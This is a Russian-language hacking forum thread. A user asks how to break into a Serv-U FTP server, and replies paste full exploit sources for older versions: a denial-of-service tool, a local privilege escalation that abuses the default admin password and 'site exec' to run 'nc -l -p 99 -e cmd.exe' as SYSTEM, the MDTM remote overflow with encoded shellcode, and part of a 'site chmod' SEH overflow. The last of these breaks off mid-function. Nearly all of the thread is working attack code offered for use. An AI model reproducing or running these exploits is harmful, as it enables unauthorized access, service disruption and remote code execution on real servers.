собственно нужно узнать есть ли в нем уязвимости. это FTP сервер довольно популярный кстати. Многие пишут что есть и что типа сами его ломали и получали через него доступ, но как никто сказать не могут. весь рунет облазил но ничего скольнибудь полезного не нашел помогите пожалста поишите что нить в нерускоязычном интернете, а то у меня с языками уж очень туго... буду очень благодарен.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Serv-U 6.0.0.2
- Автор темы mause
- Дата начала
Под шестую ветку Serv-U пока нет сплойтов, она самая свежая... :P
- Автор темы
- Добавить закладку
- #3
ээээээ самая свежая? этой версии уже наверно года 2-2,5.... если не больше.....
а для каких есть?
а для каких есть?
Serv-U < 5.2 Remote Denial of Service Exploit :
Serv-U 3x - 5.x Local Privilege Escalation Exploit :
Добавлено в [time]1157441834[/time]
Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit :
Serv-U 4.x "site chmod" Remote Buffer Overflow Exploit :
Код:
/*
denial of service in Serv-u up to 5.2
str0ke@milw0rm.com - www.milw0rm.com
Advisory: http://www.securitytracker.com/alerts/2004/Sep/1011219.html
Ya its useless.
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#define SERVER_PORT 21
usage(char *name)
{
printf("usage: %s -h hostname/ip -u user -p passwd\n",name);
printf("\t\tstr0ke - Serv-U up to 5.2 Denial of Service\n");
exit(0);
}
main(int argc, char *argv[]) {
char buffer[1000],host[255],user[255],pass[255],c;
int sd, rc, i=0;
struct sockaddr_in localAddr, servAddr;
struct hostent *h;
if ( argc < 3) {
usage(argv[0]);
}
while ((c = getopt (argc, argv, "h:u:p:")) != EOF)
switch(c)
{
case 'h':
strncpy(host,optarg,sizeof(host));
break;
case 'u':
strncpy(user,optarg,sizeof(user));
break;
case 'p':
strncpy(pass,optarg,sizeof(pass));
break;
}
h = gethostbyname(host);
if(h==NULL) {
printf("unknown host '%s'\n",host);
exit(1);
}
servAddr.sin_family = h->h_addrtype;
memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
servAddr.sin_port = htons(SERVER_PORT);
sd = socket(AF_INET, SOCK_STREAM, 0);
if(sd<0) {
perror("cannot open socket ");
exit(1);
}
localAddr.sin_family = AF_INET;
localAddr.sin_addr.s_addr = htonl(INADDR_ANY);
localAddr.sin_port = htons(0);
rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));
if(rc<0) {
printf("%d: cannot bind port TCP %u\n",sd,SERVER_PORT);
perror("error ");
exit(1);
}
printf("Trying To Connect To [%s]\n",host);
rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
if(rc<0) {
perror("cannot connect ");
exit(1);
}
printf("Trying Login With [%s]\n",user);
snprintf(buffer,sizeof(buffer), "USER %s\r\n", user);
rc = send(sd, buffer, strlen(buffer), 0);
memset(buffer,0,sizeof(buffer));
while(1)
{
rc=recv(sd,buffer,sizeof(buffer),0);
if(strstr(buffer,"331")) break;
if(strstr(buffer,"421"))
{
printf("Access Denied on your arse..\n");
exit(0);
}
}
printf("Sending Pass - [%s]\n",pass);
memset(buffer,0,sizeof(buffer));
snprintf(buffer,sizeof(buffer), "PASS %s\r\n", pass);
rc = send(sd,buffer, strlen(buffer), 0);
while(1)
{
rc=recv(sd,buffer,sizeof(buffer),0);
if(strstr(buffer,"230")) break;
if(strstr(buffer,"421"))
{
printf("Access Denied on your arse..\n");
exit(0);
}
if(strstr(buffer,"530"))
{
printf("Access Denied: Login Incorrect!\n");
exit(0);
}
}
memset(buffer,0,sizeof(buffer));
snprintf(buffer,sizeof(buffer), "STOU AUX\r\n");
rc = send(sd,buffer, strlen(buffer), 0);
printf("Dos Sent\n");
if(rc<0) {
perror("cannot send data ");
close(sd);
exit(1);
}
return 0;
}
// milw0rm.com [2004-09-13]Serv-U 3x - 5.x Local Privilege Escalation Exploit :
Код:
/*
* Hax0rcitos proudly presents
* Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
*
* All Serv-u Versions have default Login/password for local Administration.
* This account is only available to connect in the loopback interface, so a
* local user will be able to connect to Serv-u with this account and create
* an ftp user with execute rights. after the user is created, just connect
* to the ftp server and execute a raw "SITE EXEC" command. the program will
* be execute with SYSTEM privileges.
*
* Copyright (c) 2003-2004 Haxorcitos com . All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*
* Date: 10/2003
* Author: Andrés Tarascó Acunha
*
* Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
*
* Tested Against Serv-u 4.x and v5.1.0.0
G:\exploit\serv-U\local>whoami
INSANE\aT4r
G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
Serv-u >3.x Local Exploit by Haxorcitos
<220 Serv-U FTP Server v5.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=3
220 Domain settings saved
******************************************************
[+] Domain Haxorcitos:3 Created
[+] Setting New Domain Online
<220 Server command OK
******************************************************
[+] Creating Evil User
<200-User=haxorcitos
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER haxorcitos
<331 User name okay, need password.
******************************************************
>PASS whitex0r
<230 User logged in, proceed.
******************************************************
[+] Now Executing: nc -l -p 99 -e cmd.exe
<220 Domain deleted
******************************************************
G:\exploit\serv-U\local>nc localhost 99
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>whoami
whoami
NT AUTHORITY\SYSTEM
C:\>
*/
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <io.h>
#include <process.h>
//Responses
#define BANNER "220 "
#define USEROK "331 User name okay"
#define PASSOK "230 User logged in, proceed."
#define ADMOK "230-Switching to SYSTEM MAINTENANCE mode."
#define DOMAINID "200-DomainID="
//Commands
#define XPLUSER "USER haxorcitos\r\n"
#define XPLPASSWORD "PASS whitex0r\r\n"
#define USER "USER LocalAdministrator\r\n"
#define PASSWORD "PASS #l@$ak#.lk;0@P\r\n"
#define MAINTENANCE "SITE MAINTENANCE\r\n"
#define EXIT "QUIT\r\n"
char newdomain[]="-SETDOMAIN\r\n"
"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
"-TZOEnable=0\r\n"
" TZOKey=\r\n";
/* "-DynDNSEnable=0\r\n"
" DynIPName=\r\n";
*/
char deldomain[]="-DELETEDOMAIN\r\n"
"-IP=0.0.0.0\r\n"
" PortNo=2121\r\n";
char newuser[] =
"-SETUSERSETUP\r\n"
"-IP=0.0.0.0\r\n"
"-PortNo=2121\r\n"
"-User=haxorcitos\r\n"
"-Password=whitex0r\r\n"
"-HomeDir=c:\\\r\n"
"-LoginMesFile=\r\n"
"-Disable=0\r\n"
"-RelPaths=1\r\n"
"-NeedSecure=0\r\n"
"-HideHidden=0\r\n"
"-AlwaysAllowLogin=0\r\n"
"-ChangePassword=0\r\n"
"-QuotaEnable=0\r\n"
"-MaxUsersLoginPerIP=-1\r\n"
"-SpeedLimitUp=0\r\n"
"-SpeedLimitDown=0\r\n"
"-MaxNrUsers=-1\r\n"
"-IdleTimeOut=600\r\n"
"-SessionTimeOut=-1\r\n"
"-Expire=0\r\n"
"-RatioUp=1\r\n"
"-RatioDown=1\r\n"
"-RatiosCredit=0\r\n"
"-QuotaCurrent=0\r\n"
"-QuotaMaximum=0\r\n"
"-Maintenance=None\r\n"
"-PasswordType=Regular\r\n"
"-Ratios=None\r\n"
" Access=c:\\|RELP\r\n";
#define localport 43958
#define localip "127.0.0.1"
char cadena[1024];
int rec,domain;
/******************************************************************************/
void ParseCommands(int sock, char *data, int ShowSend, int showResponses,
char *response) {
send(sock,data,strlen(data),0);
if (ShowSend) printf(">%s",data);
Sleep(100);
do {
rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
if (rec<=0) return;
if (showResponses) printf("<%s",cadena);
if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0)
domain=atoi(cadena+strlen(DOMAINID));
//} while (strncmp(cadena,response,strlen(response))!=0);
} while (strstr(cadena,response)==NULL);
printf("******************************************************\r\n");
}
/******************************************************************************/
int main(int argc, char* argv[])
{
WSADATA ws;
int sock,sock2;
struct sockaddr_in haxorcitos;
struct sockaddr_in xpl;
printf("Serv-u >3.x Local Exploit by Haxorcitos\r\n\r\n");
if (argc<2) {
printf("USAGE: ServuLocal.exe \"command\"\r\n");
printf("Example: ServuLocal.exe \"nc.exe -l -p 99 -e cmd.exe\"");
return(0);
}
if (WSAStartup( MAKEWORD(2,2), &ws )!=0) {
printf(" [-] WSAStartup() error\n");
exit(0);
}
haxorcitos.sin_family = AF_INET;
haxorcitos.sin_port = htons(localport);
haxorcitos.sin_addr.s_addr = inet_addr(localip);
sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos));
rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
printf("<%s",cadena);
ParseCommands(sock,USER,1,1,USEROK);
ParseCommands(sock,PASSWORD,1,1,PASSOK);
ParseCommands(sock,MAINTENANCE,1,0,"230 ");
printf("[+] Creating New Domain...\r\n");
ParseCommands(sock,newdomain,0,1,BANNER);
printf("[+] Domain Haxorcitos:%i Created\n",domain);
/* Only for v5.x
printf("[+] Setting New Domain Online\r\n");
sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n
Command=DomainOnline\r\n",domain);
ParseCommands(sock,cadena,0,1,BANNER);
*/
printf("[+] Creating Evil User\r\n");
ParseCommands(sock,newuser,0,1,"200 ");
Sleep(1000);
printf("[+] Now Exploiting...\r\n");
xpl.sin_family = AF_INET;
xpl.sin_port = htons(2121);
xpl.sin_addr.s_addr = inet_addr(localip);
sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl));
rec=recv(sock2,cadena,sizeof(cadena),0); cadena[rec]='\0';
ParseCommands(sock2,XPLUSER,1,1,USEROK);
ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK);
printf("[+] Now Executing: %s\r\n",argv[1]);
sprintf(cadena,"site exec %s\r\n",argv[1]);
send(sock2,cadena,strlen(cadena),0);
shutdown(sock2,SD_BOTH);
Sleep(100);
ParseCommands(sock,deldomain,0,1,BANNER);
send(sock,EXIT,strlen(EXIT),0);
shutdown(sock,SD_BOTH);
closesocket(sock);
closesocket(sock2);
return 0;
}
// milw0rm.com [2004-08-08]Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit :
Код:
/* ex_servu.c - Serv-U FTPD 3.x/4.x/5.x "MDTM" Command remote overflow exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* BUG find by bkbll (bkbll@cnhonker.com), cool! :ppPPppPPPpp :D
*
* code by Sam and 2004/01/07
* <chen_xiaobo@venustech.com.cn>
* <Sam@0x557.org>
*
*
* Revise History:
* 2004/01/14 add rebind shellcode :> we can bind shellport at ftpd port.
* 2004/01/09 connect back shellcode added :)
* 2004/01/08 21:04 upgrade now :), we put shellcode in file parameter
* we can attack pacthed serv-U;PPPp by airsupply
* 2004/01/08 change shellcode working on serv-u 4.0/4.1/4.2 now
* :D thx airsupply
*
* Compile: gcc -o ex_servu ex_servu.c
*
* how works?
* [root@core exp]# ./sv -h 192.168.10.119 -t 3
* Serv-U FTPD 3.x/4.x MDTM Command remote overflow exploit
* bug find by bkbll (bkbll@cnhonker.com) code by Sam (Sam@0x557.org)
*
* # Connecting......
* [+] Connected.
* [*] USER ftp .
* [*] 10 bytes send.
* [*] PASS sst@SERV-u .
* [*] 17 bytes send.
* [+] login success .
* [+] remote version: Serv-U v4.x with Windows XP EN SP1
* [+] trigger vulnerability !
* [+] 1027 bytes overflow strings sent!
* [+] successed!!
*
*
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* [Sam Chen@SAM C:\]#
*
*
* some thanks/greets to:
* bkbll (he find this bug :D), airsupply, kkqq, icbm
* and everyone else who's KNOW SST;P
* http://0x557.org
*/
#include <stdio.h>
#include <unistd.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>
#define VER "v5.0"
#define clearbit(buff) bzero(buff, sizeof (buff));
#define padding(buff, a) memset(buff, a, sizeof (buff));
#define MAX_LEN 2048
#define MAX_NUM 4
int x = 0, port = 21, shellport;
char pass[20], user[20];
struct archs {
char *desc;
unsigned int magic;
}architectures[] = {
{
"Serv-U v3.x/4.x/5.x with Windows 2K CN", //winmm.dll
0x77535985
},
{
"Serv-U v3.x/4.x/5.x with Windows 2K BIG5 version", //winmm.dll
0x77531790
},
{
"Serv-U v3.x/4.x/5.x with Windows 2K EN",
0x77575985
},
{
"Serv-U v3.x/4.x/5.x with Windows XP CN SP1",
0x76b12f69
},
{
"Serv-U v3.x/4.x/5.x with Windows XP EN SP1",
0x76b42a3a
}
};
char decoder [] =
/* 36 bytes cool decoder by airsupply :) */
"\x90\x90\x90\x5E\x5F\x5B\xBE\x52\x52\x49\x41\x46\xBF\x52\x52\x31"
"\x41\x47\x43\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7"
"\xFF\xD3\x90\x90";
/* fork + rebind shellcode by airsupply (one way shellcode) */
char shellcode [] =
"\x53\x52\x49\x41"
/*port offset 120 + 4*/
"\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12\xD9\x85\x12\x99\x12\xD9"
"\x91\x18\x75\x19\x98\x99\x99\x12\x65\x12\x76\x32\x70\x8B\x9B\x99"
"\x99\xC7\xAA\x50\x28\x90\x66\xEE\x65\x71\xB9\x98\x99\x99\xF1\xF5"
"\xF5\x99\x99\xF1\xAA\xAB\xB7\xFD\xF1\xEE\xEA\xAB\xC6\xCD\x66\xCC"
"\x9D\x32\xAA\x50\x28\x9C\x66\xEE\x65\x71\x99\x98\x99\x99\x12\x6C"
"\x71\x94\x98\x99\x99\xAA\x66\x18\x75\x09\x98\x99\x99\xCD\xF1\x98"
"\x98\x99\x99\x66\xCF\xB5\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF"
"\xA9\x12\x41\xCE\xCE\xF1\x9B\x99\x8C\x5B\x12\x55\xCA\xC8\xF3\x8F"
"\xC8\xCA\x66\xCF\xAD\xC0\xC2\x1C\x59\xEC\x68\xCE\xCA\x66\xCF\xA1"
"\xCE\xC8\xCA\x66\xCF\xA5\x12\x49\x10\x1F\xD9\x98\x99\x99\xF1\xFC"
"\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\x3F\xA9\x98\x99\x99\x1A\x75"
"\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\x32\x7B\x64\x5F\xDD"
"\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\x10\xCD\xBD\xD1\x10"
"\xCD\xBD\xD5\x10\xCD\xBD\xC9\x14\xDD\xBD\x89\x14\x27\xDD\x98\x99"
"\x99\xCE\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\x2F\xA9\x98\x99"
"\x99\xC8\x66\xCF\x91\xAA\x59\xD1\xC9\x66\xCF\x95\xCA\xCC\xCF\xCE"
"\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81"
"\x12\xC3\xB9\x9A\x44\x7A\xA9\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65"
"\xAA\x59\x35\xA3\x79\xED\x9E\x58\x56\x9E\x9A\x61\x72\x6B\xA2\xE5"
"\xBD\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85"
"\x9A\x44\x12\x9D\x12\x9A\x5C\xC6\xC7\xC4\xC2\x5B\x9D\x99\xC8\x66"
"\xED\xBD\x91\x34\xC9\x71\x3B\x66\x66\x66\x1A\x5D\x9D\xC0\x32\x7B"
"\x74\x5A\xF1\xFC\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\x3F\xA9\x98"
"\x99\x99\x1A\x75\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\x10"
"\xDD\xBD\xD1\x10\xDD\xBD\xD5\x10\xDD\xBD\xC9\x14\xDD\xBD\x89\x14"
"\x27\xDD\x98\x99\x99\xCE\xC9\xC8\xC8\xF3\x9D\xC8\xC8\xC8\x66\x2F"
"\xA9\x98\x99\x99\xC8\x66\xCF\x91\x18\x75\x99\x9D\x99\x99\xF1\x9E"
"\x99\x98\x99\xCD\x66\x2F\xD1\x98\x99\x99\x66\xCF\x89\xF3\xD9\xF1"
"\x99\x89\x99\x99\xF1\x99\xC9\x99\x99\xF3\x99\x66\x2F\xDD\x98\x99"
"\x99\x66\xCF\x8D\x10\x1D\xBD\x21\x99\x99\x99\x10\x1D\xBD\x2D\x99"
"\x99\x99\x12\x15\xBD\xF9\x9D\x99\x99\x5E\xD8\x62\x09\x09\x09\x09"
"\x5F\xD8\x66\x09\x1A\x70\xCC\xF3\x99\xF1\x99\x89\x99\x99\xC8\xC9"
"\x66\x2F\xDD\x98\x99\x99\x66\xCF\x81\xCD\x66\x2F\xD1\x98\x99\x99"
"\x66\xCF\x85\x66\x2F\xD1\x98\x99\x99\x66\xCF\xB9\xAA\x59\xD1\xC9"
"\x66\xCF\x95\x71\x70\x64\x66\x66\xAB\xED\x08\x95\x50\x25\x3F\xF2"
"\x16\x6B\x81\xF8\x51\xCE\xD6\x88\x68\xE2\x05\x76\xC1\x96\xD8\x0E"
"\x51\xCE\xD6\x8E\x4F\x15\x07\x6A\xFA\x10\x48\xD6\xA4\xF3\x2D\x19"
"\xB4\xAB\xE1\x47\xFD\x89\x3E\x44\x95\x06\x4A\xD2\x28\x87\x0E\x98"
"\x06\x06\x06\x06"
"\x53\x52\x31\x41";
/* new:
* tcp connect with no block socket, host to ip.
* millisecond timeout, it's will be fast.
*;D
* 2003/06/23 add by Sam
*/
int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
{
int sock,
flag,
pe = 0;
size_t pe_len;
struct timeval tv;
struct sockaddr_in addr;
struct hostent* hp = NULL;
fd_set rset;
// reslov hosts
hp = gethostbyname (host);
if (NULL == hp) {
perror ("tcpConnect:gethostbyname\n");
return -1;
}
sock = socket (AF_INET, SOCK_STREAM, 0);
if (-1 == sock) {
perror ("tcpConnect:socket\n");
return -1;
}
addr.sin_addr = *(struct in_addr *) hp->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons (port);
/* set socket no block
*/
flag = fcntl (sock, F_GETFL);
if (-1 == flag) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
flag |= O_NONBLOCK;
if (fcntl (sock, F_SETFL, flag) < 0) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
if (connect (sock, (const struct sockaddr *) &addr,
sizeof(addr)) < 0 &&
errno != EINPROGRESS) {
perror ("tcpConnect:connect\n");
close (sock);
return -1;
}
/* set connect timeout
* use millisecond
*/
tv.tv_sec = timeout/1000;
tv.tv_usec = timeout%1000;
FD_ZERO (&rset);
FD_SET (sock, &rset);
if (select (sock+1, &rset, &rset, NULL, &tv) <= 0) {
// perror ("tcpConnect:select");
close (sock);
return -1;
}
pe_len = sizeof (pe);
if (getsockopt (sock, SOL_SOCKET, SO_ERROR, &pe, &pe_len) < 0) {
perror ("tcpConnect:getsockopt\n");
close (sock);
return -1;
}
if (pe != 0) {
errno = pe;
close (sock);
return -1;
}
if (fcntl(sock, F_SETFL, flag&~O_NONBLOCK) < 0) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
pe = 1;
pe_len = sizeof (pe);
if (setsockopt (sock, IPPROTO_TCP, TCP_NODELAY, &pe, pe_len) < 0){
perror ("tcpConnect:setsockopt\n");
close (sock);
return -1;
}
return sock;
}
/* rip code, from hsj */
int sh (int in, int out, int s)
{
char sbuf[128], rbuf[128];
int i,
ti, fd_cnt,
ret=0, slen=0, rlen=0;
fd_set rd, wr;
fd_cnt = in > out ? in : out;
fd_cnt = s > fd_cnt ? s : fd_cnt;
fd_cnt ++;
for (;;) {
FD_ZERO (&rd);
if (rlen < sizeof (rbuf))
FD_SET (s, &rd);
if (slen < sizeof (sbuf))
FD_SET (in, &rd);
FD_ZERO (&wr);
if (slen)
FD_SET (s, &wr);
if (rlen)
FD_SET (out, &wr);
if ((ti = select (fd_cnt, &rd, &wr, 0, 0)) == (-1))
break;
if (FD_ISSET (in, &rd)) {
if((i = read (in, (sbuf+slen),
(sizeof (sbuf) - slen))) == (-1)) {
ret = -2;
break;
}
else if (i == 0) {
ret = -3;
break;
}
slen += i;
if (!(--ti))
continue;
}
if (FD_ISSET (s, &wr)) {
if ((i = write (s, sbuf, slen)) == (-1))
break;
if (i == slen)
slen = 0;
else {
slen -= i;
memmove (sbuf, sbuf + i, slen);
}
if (!(--ti))
continue;
}
if (FD_ISSET (s, &rd)) {
if ((i = read (s, (rbuf + rlen),
(sizeof (rbuf) - rlen))) <= 0)
break;
rlen += i;
if (!(--ti))
continue;
}
if (FD_ISSET (out, &wr)) {
if ((i = write (out, rbuf, rlen)) == (-1))
break;
if (i == rlen)
rlen = 0;
else {
rlen -= i;
memmove (rbuf, rbuf+i, rlen);
}
}
}
return ret;
}
int new_send (int fd, char *buff, size_t len)
{
int ret;
if ((ret = send (fd, buff, len, 0)) <= 0) {
perror ("new_write");
return -1;
}
return ret;
}
int new_recv (int fd, char *buff, size_t len)
{
int ret;
if ((ret = recv (fd, buff, len, 0)) <= 0) {
perror ("new_recv");
return -1;
}
return ret;
}
int ftp_login (char *hostName, short port, char *user, char *pass)
{
int ret, sock;
char buff[MAX_LEN];
fprintf (stderr, "# Connecting...... \n");
if ((sock = new_tcpConnect (hostName, port, 4000)) <= 0) {
fprintf (stderr, "[-] failed. \n");
return -1;
}
clearbit (buff);
new_recv (sock, buff, sizeof (buff) - 1);
if (!strstr (buff, "220")) {
fprintf (stderr, "[-] failed. \n");
return -1;
}
fprintf (stderr, "[+] Connected. \n");
sleep (1);
fprintf (stderr, "[*] USER %s .\n", user);
clearbit (buff);
snprintf (buff, sizeof (buff), "USER %s\r\n", user);
ret = new_send (sock, buff, strlen (buff));
fprintf (stderr, "[*] %d bytes send. \n", ret);
sleep (1);
clearbit (buff);
new_recv (sock, buff, sizeof (buff) - 1);
if (!strstr (buff, "331")) {
fprintf (stderr, "[-] user failed. \n%s\n", buff);
return -1;
}
fprintf (stderr, "[*] PASS %s .\n", pass);
clearbit (buff);
snprintf (buff, sizeof (buff), "PASS %s\r\n", pass);
ret = new_send (sock, buff, strlen (buff));
fprintf (stderr, "[*] %d bytes send. \n", ret);
sleep (1);
clearbit (buff);
new_recv (sock, buff, sizeof (buff) - 1);
if (!strstr (buff, "230")) {
fprintf (stderr, "[-] pass failed. \n%s\n", buff);
return -1;
}
fprintf (stderr, "[+] login success .\n");
return sock;
}
void do_overflow (int sock)
{
int ret, i;
unsigned short newport;
char Comand [MAX_LEN] = {0}, chmodBuffer [600], rbuf[256];
clearbit (Comand);
clearbit (rbuf);
clearbit (chmodBuffer);
for(i = 0; i < 47; i++)
strcat(chmodBuffer, "a");
for(i = 0; i < 16; i += 8) {
*(unsigned int*)&chmodBuffer[47+i] = 0x06eb9090;
*(unsigned int*)&chmodBuffer[51+i] = architectures[x].magic; //0x1002bd78; //pop reg pop reg ret
}
newport = htons (shellport)^(unsigned short)0x9999;
memcpy (&shellcode[120 + 4], &newport, 2);
strcat(chmodBuffer, decoder);
fprintf (stderr, "[+] remote version: %s\n", architectures[x].desc);
fprintf (stderr, "[+] trigger vulnerability !\n ");
strcpy (Comand, "MDTM 20031111111111+");
strncat (Comand, chmodBuffer, strlen (chmodBuffer) - 1);
strcat (Comand, " ");
strcat (Comand, shellcode);
strcat (Comand, "hacked_by.sst\r\n");
ret = new_send (sock, Comand, strlen (Comand));
fprintf (stderr, "[+] %d bytes overflow strings sent!\n", ret);
return;
}
/* print help messages.
* just show ya how to use.
*/
void showHELP (char *p)
{
int i;
fprintf (stderr, "Usage: %s [Options] \n", p);
fprintf (stderr, "Options:\n"
"\t-h [remote host]\tremote host\n"
"\t-P [server port]\tserver port\n"
"\t-t [system type]\tchoice the system type\n"
"\t-u [user name]\tlogin with this username\n"
"\t-p [pass word]\tlogin with this passwd\n"
"\t-d [shell port]\trebind using this port (default: ftpd port)\n\n");
printf ("num . description\n");
printf ("----+-----------------------------------------------"
"--------\n");
for (i = 0; i <= MAX_NUM; i ++) {
printf ("%3d | %s\n", i, architectures[i].desc);
}
printf (" '\n");
return;
}
int main (int c, char *v[])
{
int ch, fd, sd;
char *hostName = NULL, *userName = "ftp", *passWord = "sst@SERV-u";
shellport = port;
fprintf (stderr, "Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit "VER"\n"
"bug find by bkbll (bkbll@cnhonker.net) code by Sam (Sam@0x557.org)\n\n");
if (c < 2) {
showHELP (v[0]);
exit (1);
}
while((ch = getopt(c, v, "h:t:u:p:P:c:d:")) != EOF) {
switch(ch) {
case 'h':
hostName = optarg;
break;
case 't':
x = atoi (optarg);
if (x > MAX_NUM) {
printf ("[-] wtf your input?\n");
exit (-1);
}
break;
case 'u':
userName = optarg;
break;
case 'p':
passWord = optarg;
break;
case 'P':
port = atoi (optarg);
break;
case 'd':
shellport = atoi (optarg);
break;
default:
showHELP (v[0]);
return 0;
}
}
fd = ftp_login (hostName, port, userName, passWord);
if (fd <= 0) {
printf ("[-] can't connnect\n");
exit (-1);
}
do_overflow (fd);
close (fd);
sleep (3);
sd = new_tcpConnect (hostName, shellport, 3000);
if (sd <= 0) {
printf ("[-] failed\n");
return -1;
}
fprintf (stderr, "[+] successed!!\n\n\n");
sh (0, 1, sd);
close (sd);
return 0;
}Serv-U 4.x "site chmod" Remote Buffer Overflow Exploit :
Код:
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define exploit_length 511
#define NOP 'A'
#define SEH_handler_offset 400
char* SEH_handler = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b
char* shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a"
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb"
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0"
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44"
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b"
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff"
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff"
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0"
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";
int sock;
FILE* FILEsock;
int doubling;
void send_command(char *command, char *arguments) {
int i;
send(sock, command, strlen(command), 0);
send(sock, " ", 1, 0);
